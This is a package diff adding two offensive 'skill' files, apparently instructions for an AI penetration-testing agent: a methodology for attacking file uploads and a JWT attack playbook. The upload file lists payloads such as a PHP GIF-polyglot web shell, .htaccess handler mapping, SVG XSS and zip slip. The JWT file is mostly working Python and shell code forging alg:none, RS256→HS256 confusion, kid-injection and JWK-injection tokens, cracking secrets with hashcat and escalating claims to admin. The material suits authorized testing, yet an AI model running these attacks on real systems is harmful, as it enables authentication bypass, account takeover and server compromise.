@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md

@@ -0,0 +1,190 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: insecure-file-uploads
+description: File upload security testing covering extension bypass, content-type manipulation, and path traversal
+---
+
+# Insecure File Uploads
+
+Upload surfaces are high risk: server-side execution (RCE), stored XSS, malware distribution, storage takeover, and DoS. Modern stacks mix direct-to-cloud uploads, background processors, and CDNs—authorization and validation must hold across every step.
+
+## Attack Surface
+
+- Web/mobile/API uploads, direct-to-cloud (S3/GCS/Azure) presigned flows, resumable/multipart protocols (tus, S3 MPU)
+- Image/document/media pipelines (ImageMagick/GraphicsMagick, Ghostscript, ExifTool, PDF engines, office converters)
+- Admin/bulk importers, archive uploads (zip/tar), report/template uploads, rich text with attachments
+- Serving paths: app directly, object storage, CDN, email attachments, previews/thumbnails
+
+## Reconnaissance
+
+### Surface Map
+
+- Endpoints/fields: upload, file, avatar, image, attachment, import, media, document, template
+- Direct-to-cloud params: key, bucket, acl, Content-Type, Content-Disposition, x-amz-meta-*, cache-control
+- Resumable APIs: create/init → upload/chunk → complete/finalize; check if metadata/headers can be altered late
+- Background processors: thumbnails, PDF→image, virus scan queues; identify timing and status transitions
+
+### Capability Probes
+
+- Small probe files of each claimed type; diff resulting Content-Type, Content-Disposition, and X-Content-Type-Options on download
+- Magic bytes vs extension: JPEG/GIF/PNG headers; mismatches reveal reliance on extension or MIME sniffing
+- SVG/HTML probe: do they render inline (text/html or image/svg+xml) or download (attachment)?
+- Archive probe: simple zip with nested path traversal entries and symlinks to detect extraction rules
+
+## Detection Channels
+
+### Server Execution
+
+- Web shell execution (language dependent), config/handler uploads (.htaccess, .user.ini, web.config) enabling execution
+- Interpreter-side template/script evaluation during conversion (ImageMagick/Ghostscript/ExifTool)
+
+### Client Execution
+
+- Stored XSS via SVG/HTML/JS if served inline without correct headers; PDF JavaScript; office macros in previewers
+
+### Header and Render
+
+- Missing X-Content-Type-Options: nosniff enabling browser sniff to script
+- Content-Type reflection from upload vs server-set; Content-Disposition: inline vs attachment
+
+### Process Side Effects
+
+- AV/CDR race or absence; background job status allows access before scan completes; password-protected archives bypass scanning
+
+## Core Payloads
+
+### Web Shells and Configs
+
+- PHP: GIF polyglot (starts with GIF89a) followed by `<?php echo 1; ?>`; place where PHP is executed
+- .htaccess to map extensions to code (AddType/AddHandler); .user.ini (auto_prepend/append_file) for PHP-FPM
+- ASP/JSP equivalents where supported; IIS web.config to enable script execution
+
+### Stored XSS
+
+- SVG with onload/onerror handlers served as image/svg+xml or text/html
+- HTML file with script when served as text/html or sniffed due to missing nosniff
+
+### MIME Magic Polyglots
+
+- Double extensions: avatar.jpg.php, report.pdf.html; mixed casing: .pHp, .PhAr
+- Magic-byte spoofing: valid JPEG header then embedded script; verify server uses content inspection, not extensions alone
+
+### Archive Attacks
+
+- Zip Slip: entries with `../../` to escape extraction dir; symlink-in-zip pointing outside target; nested zips
+- Zip bomb: extreme compression ratios to exhaust resources in processors
+
+### Toolchain Exploits
+
+- ImageMagick/GraphicsMagick legacy vectors (policy.xml may mitigate): crafted SVG/PS/EPS invoking external commands or reading files
+- Ghostscript in PDF/PS with file operators (%pipe%)
+- ExifTool metadata parsing bugs; overly large or crafted EXIF/IPTC/XMP fields
+
+### Cloud Storage Vectors
+
+- S3/GCS presigned uploads: attacker controls Content-Type/Disposition; set text/html or image/svg+xml and inline rendering
+- Public-read ACL or permissive bucket policies expose uploads broadly
+- Object key injection via user-controlled path prefixes
+- Signed URL reuse and stale URLs; serving directly from bucket without attachment + nosniff headers
+
+## Advanced Techniques
+
+### Resumable Multipart
+
+- Change metadata between init and complete (e.g., swap Content-Type/Disposition at finalize)
+- Upload benign chunks, then swap last chunk or complete with different source
+
+### Filename and Path
+
+- Unicode homoglyphs, trailing dots/spaces, device names, reserved characters to bypass validators
+- Null-byte truncation on legacy stacks; overlong paths; case-insensitive collisions overwriting existing files
+
+### Processing Races
+
+- Request file immediately after upload but before AV/CDR completes
+- Trigger heavy conversions (large images, deep PDFs) to widen race windows
+
+### Metadata Abuse
+
+- Oversized EXIF/XMP/IPTC blocks to trigger parser flaws
+- Payloads in document properties of Office/PDF rendered by previewers
+
+### Header Manipulation
+
+- Force inline rendering with Content-Type + inline Content-Disposition
+- Cache poisoning via CDN with keys missing Vary on Content-Type/Disposition
+
+## Bypass Techniques
+
+### Validation Gaps
+
+- Client-side only checks; relying on JS/MIME provided by browser
+- Trusting multipart boundary part headers blindly
+- Extension allowlists without server-side content inspection
+
+### Evasion Tricks
+
+- Double extensions, mixed case, hidden dotfiles, extra dots (file..png), long paths with allowed suffix
+- Multipart name vs filename vs path discrepancies; duplicate parameters and late parameter precedence
+
+## Special Contexts
+
+### Rich Text Editors
+
+- RTEs allow image/attachment uploads and embed links; verify sanitization and serving headers
+
+### Mobile Clients
+
+- Mobile SDKs may send nonstandard MIME or metadata; servers sometimes trust client-side transformations
+
+### Serverless and CDN
+
+- Direct-to-bucket uploads with Lambda/Workers post-processing; verify security decisions are not delegated to frontends
+- CDN caching of uploaded content; ensure correct cache keys and headers
+
+## Testing Methodology
+
+1. **Map the pipeline** - Client → ingress → storage → processors → serving. Note where validation and auth occur
+2. **Identify allowed types** - Size limits, filename rules, storage keys, and who serves the content
+3. **Collect baselines** - Capture resulting URLs and headers for legitimate uploads
+4. **Exercise bypass families** - Extension games, MIME/content-type, magic bytes, polyglots, metadata payloads, archive structure
+5. **Validate execution** - Can uploaded content execute on server or client?
+
+## Validation
+
+1. Demonstrate execution or rendering of active content: web shell reachable, or SVG/HTML executing JS when viewed
+2. Show filter bypass: upload accepted despite restrictions with evidence on retrieval
+3. Prove header weaknesses: inline rendering without nosniff or missing attachment
+4. Show race or pipeline gap: access before AV/CDR; extraction outside intended directory
+5. Provide reproducible steps: request/response for upload and subsequent access
+
+## False Positives
+
+- Upload stored but never served back; or always served as attachment with strict nosniff
+- Converters run in locked-down sandboxes with no external IO and no script engines
+- AV/CDR blocks the payload and quarantines; access before scan is impossible by design
+
+## Impact
+
+- Remote code execution on application stack or media toolchain host
+- Persistent cross-site scripting and session/token exfiltration via served uploads
+- Malware distribution via public storage/CDN; brand/reputation damage
+- Data loss or corruption via overwrite/zip slip; service degradation via zip bombs
+
+## Pro Tips
+
+1. Keep PoCs minimal: tiny SVG/HTML for XSS, a single-line PHP/ASP where relevant
+2. Always capture download response headers and final MIME; that decides browser behavior
+3. Prefer transforming risky formats to safe renderings (SVG→PNG) rather than complex sanitization
+4. In presigned flows, constrain all headers and object keys server-side
+5. For archives, extract in a chroot/jail with explicit allowlist; drop symlinks and reject traversal
+6. Test finalize/complete steps in resumable flows; many validations only run on init
+7. Verify background processors with EICAR and tiny polyglots
+8. When you cannot get execution, aim for stored XSS or header-driven script execution
+9. Validate that CDNs honor attachment/nosniff
+10. Document full pipeline behavior per asset type
+
+## Summary
+
+Secure uploads are a pipeline property. Enforce strict type, size, and header controls; transform or strip active content; never execute or inline-render untrusted uploads; and keep storage private with controlled, signed access.

package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md

@@ -0,0 +1,270 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# JWT Attacks — Algorithm Confusion, None Attack, Key Confusion
+
+Complete methodology for testing JSON Web Token vulnerabilities: alg:none, RS256→HS256 confusion, weak secrets, kid injection, JWK injection.
+
+## Install
+
+```bash
+pip install pyjwt cryptography --break-system-packages
+# jwt_tool (all-in-one):
+git clone https://github.com/ticarpi/jwt_tool /opt/jwt_tool
+pip install termcolor cprint pycryptodomex requests --break-system-packages
+
+# hashcat for secret cracking:
+sudo apt-get install -y hashcat
+```
+
+---
+
+## Phase 1: Decode & Inspect
+
+```bash
+# Decode JWT without verification:
+TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
+
+# Split and decode manually:
+echo $TOKEN | cut -d. -f1 | base64 -d 2>/dev/null; echo
+echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null; echo
+
+# Using jwt_tool:
+python3 /opt/jwt_tool/jwt_tool.py $TOKEN
+
+# Using python:
+python3 -c "
+import base64, json
+token = '$TOKEN'
+parts = token.split('.')
+header = json.loads(base64.b64decode(parts[0] + '=='))
+payload = json.loads(base64.b64decode(parts[1] + '=='))
+print('Header:', json.dumps(header, indent=2))
+print('Payload:', json.dumps(payload, indent=2))
+"
+```
+
+---
+
+## Phase 2: Algorithm None Attack
+
+```bash
+# Change alg to 'none' — removes signature verification
+python3 -c "
+import base64, json, sys
+
+def b64url(data):
+    if isinstance(data, str):
+        data = data.encode()
+    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()
+
+original_token = sys.argv[1] if len(sys.argv) > 1 else 'PASTE_TOKEN_HERE'
+parts = original_token.split('.')
+
+header = json.loads(base64.b64decode(parts[0] + '=='))
+payload = json.loads(base64.b64decode(parts[1] + '=='))
+
+# Modify payload (e.g. escalate to admin):
+payload['role'] = 'admin'
+payload['is_admin'] = True
+payload['sub'] = '1'  # try user ID 1 (often admin)
+
+# Forge with alg:none
+header['alg'] = 'none'
+forged = b64url(json.dumps(header)) + '.' + b64url(json.dumps(payload)) + '.'
+print('Forged token (alg:none):')
+print(forged)
+" $TOKEN
+
+# jwt_tool:
+python3 /opt/jwt_tool/jwt_tool.py $TOKEN -X a  # alg:none attack
+```
+
+---
+
+## Phase 3: RS256 → HS256 Algorithm Confusion
+
+```bash
+# If server uses RS256 (asymmetric), try signing with HS256 using PUBLIC KEY as secret.
+# Server may verify HS256 using the same key material → bypass.
+
+# Step 1: Get public key from well-known endpoint:
+curl -s "https://target.com/.well-known/jwks.json" | jq .
+curl -s "https://target.com/.well-known/openid-configuration" | jq .jwks_uri
+
+# Step 2: Extract public key PEM:
+python3 -c "
+import requests, base64, json
+from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
+from cryptography.hazmat.primitives import serialization
+from cryptography.hazmat.backends import default_backend
+
+jwks = requests.get('https://target.com/.well-known/jwks.json').json()
+key = jwks['keys'][0]
+
+n = int.from_bytes(base64.urlsafe_b64decode(key['n'] + '=='), 'big')
+e = int.from_bytes(base64.urlsafe_b64decode(key['e'] + '=='), 'big')
+pub = RSAPublicNumbers(e, n).public_key(default_backend())
+pem = pub.public_bytes(serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo)
+print(pem.decode())
+" > public_key.pem
+
+# Step 3: Forge HS256 token using public key as HMAC secret:
+python3 -c "
+import jwt, json
+
+with open('public_key.pem', 'rb') as f:
+    public_key = f.read()
+
+payload = {'sub': '1', 'role': 'admin', 'iat': 9999999999}
+forged = jwt.encode(payload, public_key, algorithm='HS256')
+print('Forged HS256 token:')
+print(forged)
+"
+
+# jwt_tool:
+python3 /opt/jwt_tool/jwt_tool.py $TOKEN -S hs256 -k public_key.pem -I -pc role -pv admin
+```
+
+---
+
+## Phase 4: Weak Secret Cracking
+
+```bash
+# Crack HS256 secret with hashcat:
+echo "$TOKEN" > jwt.txt
+hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
+
+# Common weak secrets to try first:
+for secret in secret password 123456 "" "null" "undefined" "your-256-bit-secret" \
+              "secret_key" "jwt_secret" "mysecret" "changeme" "development"; do
+  python3 -c "
+import jwt, sys
+try:
+    result = jwt.decode('$TOKEN', '$secret', algorithms=['HS256'])
+    print(f'[FOUND] Secret: $secret')
+    print('Payload:', result)
+except: pass
+"
+done
+
+# If secret found — forge with admin claims:
+python3 -c "
+import jwt
+secret = 'FOUND_SECRET'
+payload = {'sub': '1', 'role': 'admin', 'is_admin': True, 'iat': 9999999999}
+forged = jwt.encode(payload, secret, algorithm='HS256')
+print(forged)
+"
+```
+
+---
+
+## Phase 5: kid (Key ID) Injection
+
+```bash
+# kid header parameter used to select signing key — inject path traversal / SQL
+
+# Directory traversal via kid:
+python3 -c "
+import base64, json, hmac, hashlib
+
+def b64url(data):
+    if isinstance(data, str):
+        data = data.encode()
+    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()
+
+# kid pointing to /dev/null → empty key
+header = {'alg': 'HS256', 'kid': '../../../dev/null', 'typ': 'JWT'}
+payload = {'sub': '1', 'role': 'admin', 'iat': 9999999999}
+
+msg = b64url(json.dumps(header)) + '.' + b64url(json.dumps(payload))
+sig = hmac.new(b'', msg.encode(), hashlib.sha256).digest()  # empty key
+forged = msg + '.' + b64url(sig)
+print('kid=/dev/null forged token:')
+print(forged)
+"
+
+# SQL injection via kid:
+# kid = "x' UNION SELECT 'attacker_secret'--"
+python3 /opt/jwt_tool/jwt_tool.py $TOKEN -I -hc kid -hv "x' UNION SELECT 'attacker_secret'-- -" -S hs256 -p 'attacker_secret'
+```
+
+---
+
+## Phase 6: JWK Header Injection
+
+```bash
+# Inject your own public key via jwk header parameter
+
+# Generate RSA key pair:
+openssl genrsa -out attacker_private.pem 2048
+openssl rsa -in attacker_private.pem -pubout -out attacker_public.pem
+
+# Forge token with embedded JWK:
+python3 -c "
+import jwt, json
+from cryptography.hazmat.primitives.serialization import load_pem_private_key
+
+with open('attacker_private.pem', 'rb') as f:
+    private_key = load_pem_private_key(f.read(), None)
+
+# Embed public JWK in header:
+headers = {'jwk': {
+    'kty': 'RSA',
+    'n': '...',  # base64url encoded modulus from attacker_public.pem
+    'e': 'AQAB',
+}}
+
+payload = {'sub': '1', 'role': 'admin', 'iat': 9999999999}
+forged = jwt.encode(payload, private_key, algorithm='RS256', headers=headers)
+print(forged)
+"
+
+# jwt_tool automates this:
+python3 /opt/jwt_tool/jwt_tool.py $TOKEN -X i -I -pc role -pv admin
+```
+
+---
+
+## Phase 7: Claim Manipulation
+
+```bash
+# Modify expiry, role, user ID with known/cracked secret:
+python3 -c "
+import jwt, time
+
+secret = 'KNOWN_SECRET'
+original = jwt.decode('$TOKEN', secret, algorithms=['HS256'])
+print('Original payload:', original)
+
+# Modifications to try:
+modifications = [
+    {'sub': '1'},           # become user ID 1 (admin)
+    {'role': 'admin'},      # elevate role
+    {'is_admin': True},     # mass assignment field
+    {'email': 'admin@target.com'},  # email takeover
+    {'exp': int(time.time()) + 31536000},  # extend expiry 1 year
+]
+
+for mod in modifications:
+    payload = {**original, **mod}
+    forged = jwt.encode(payload, secret, algorithm='HS256')
+    print(f'Modified {list(mod.keys())}: {forged[:80]}...')
+"
+```
+
+---
+
+## Pro Tips
+
+1. **Check alg:none first** — no key needed, instant test
+2. **Check JWKS endpoint** — `/.well-known/jwks.json`, `/api/auth/jwks`, `/oauth/jwks`
+3. **RS256→HS256** — requires public key; check X.509 cert endpoint too (`/api/public-key`)
+4. **Hashcat mode 16500** — fastest JWT secret cracker; try `rockyou.txt` + `best64.rule`
+5. **kid injection** — target often uses filesystem read; path traversal + SQL inject both work
+6. **Check `x5u`/`jku` headers** — URL-based key injection; point to attacker-controlled JWK server
+7. **`exp` in the past** — some servers don't verify expiry; test with expired token
+
+## Summary
+
+JWT flow: decode header/payload → check alg → try alg:none → if RS256 grab public key → try alg confusion → if HS256 crack secret with hashcat → if kid/jku present try injection → modify payload claims → forge and test.